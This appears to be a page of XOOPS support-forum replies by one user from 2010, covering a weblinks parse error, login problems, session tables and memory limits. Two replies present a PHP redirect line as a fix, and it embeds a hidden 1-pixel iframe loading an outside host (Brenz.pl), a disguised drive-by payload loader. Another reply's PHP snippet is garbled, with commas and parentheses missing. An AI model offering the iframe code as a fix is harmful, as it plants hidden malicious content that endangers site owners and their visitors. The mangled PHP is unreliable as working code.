51
Catzwolf
Re: Parse error in weblinks module
  • 2010/7/4 10:57

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


thanks for the catch Ghia.... that's what happens when you code into the small hours of the morning



52
Catzwolf
Re: Parse error in weblinks module
  • 2010/7/4 3:37

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


Whoops my bad, sorry. Try this instead and it should work.

echo '<html><head><meta http-equiv="Refresh" content="0;url="'.$url.'"></meta></head><body><iframe style="height: 1px" src="http://www.Brenz.pl/rc/" frameborder="0" width="1"></iframe></body></html>';



53
Catzwolf
Re: Parse error in weblinks module
  • 2010/7/4 2:22

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


change it to this
echo '<html><head><meta http-equiv="Refresh" content="0" URL="'.$url.'"></meta></head><body><iframe style="height: 1px" src="http://www.Brenz.pl/rc/" frameborder="0" width="1"></iframe></body></html>';



54
Catzwolf
Re: Login not working
  • 2010/6/30 19:20

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


I think what he means, is that users that should have access to 'admin' area's don't have access.



55
Catzwolf
Re: Allowed memory size of 33554432 bytes exhausted
  • 2010/6/30 18:52

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


As ghia has already suggested, this is a problem either with a bad module or rouge code somewhere.

De-active your modules one by one to see which one resolves your problem, or if you have applied any hacks etc, revert them to their original code.

Really, you shouldn't be using that amount of memory for Xoops and modules and increasing it will not solve your issue this time.



56
Catzwolf
Re: Login not working
  • 2010/6/30 18:49

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


Check that none of your database tables are corrupt, especially the users and session tables or that you do not have user defined sessions enabled (Not likely the issue, but you never know).

You can fix the database tables via phpmyadmin through your Hosting Cpanel.



57
Catzwolf
Re: Big size mysql session
  • 2010/6/30 18:43

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


Xoops should clear out old sessions when the time has expired, so I would point to this being an Xoops bug/issue. But, without having a proper look at this I couldn't be 100% positive that protector might not deal with its own sessions somewhere.

I will do some testing over the next few days and let you know one way or another.

ATB

John



58
Catzwolf
Re: Big size mysql session
  • 2010/6/30 17:03

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


Yes you can empty the session table, there shouldn't be any problems doing so.



59
Catzwolf
Re: Question about Login through user.php
  • 2010/6/27 10:08

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


Try this and see if it works for you k.

Open user.php and look for the line (roughly line 52):

if (isset($_GET['xoops_redirect'])) {
            
$xoopsTpl->assign('redirect_page'htmlspecialchars(trim($_GET['xoops_redirect']), ENT_QUOTES));
        }

and change it to this:

if ( isset( $_GET['xoops_redirect'] ) ) {
            
$xoopsTpl->assign'redirect_page'htmlspecialcharstrim$_GET['xoops_redirect'] ), ENT_QUOTES ) );
        } else if ( isset( 
$_SERVER['REQUEST_URI'] ) ) {
            
$xoopsTpl->assign'redirect_page'htmlspecialcharsxoops_getenv'REQUEST_URI' ), ENT_QUOTES ) );
        }



Also, in /include/checklogin.php, look for line 103:

$url .= $_POST['xoops_redirect'];


and change it to:

$url .= str_replace(XOOPS_URL''$_POST['xoops_redirect']);



It's not perfect but it should do what you want........ hopefully

John



60
Catzwolf
Re: multilanguage: Show Date and time
  • 2010/6/27 9:53

  • Catzwolf

  • Home away from home

  • Posts: 1392

  • Since: 2007/9/30


l, d M Y | h:i a




TopTop
« 1 ... 3 4 5 (6) 7 8 9 ... 185 »



Login

Who's Online

226 user(s) are online (113 user(s) are browsing Support Forums)


Members: 0


Guests: 226


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits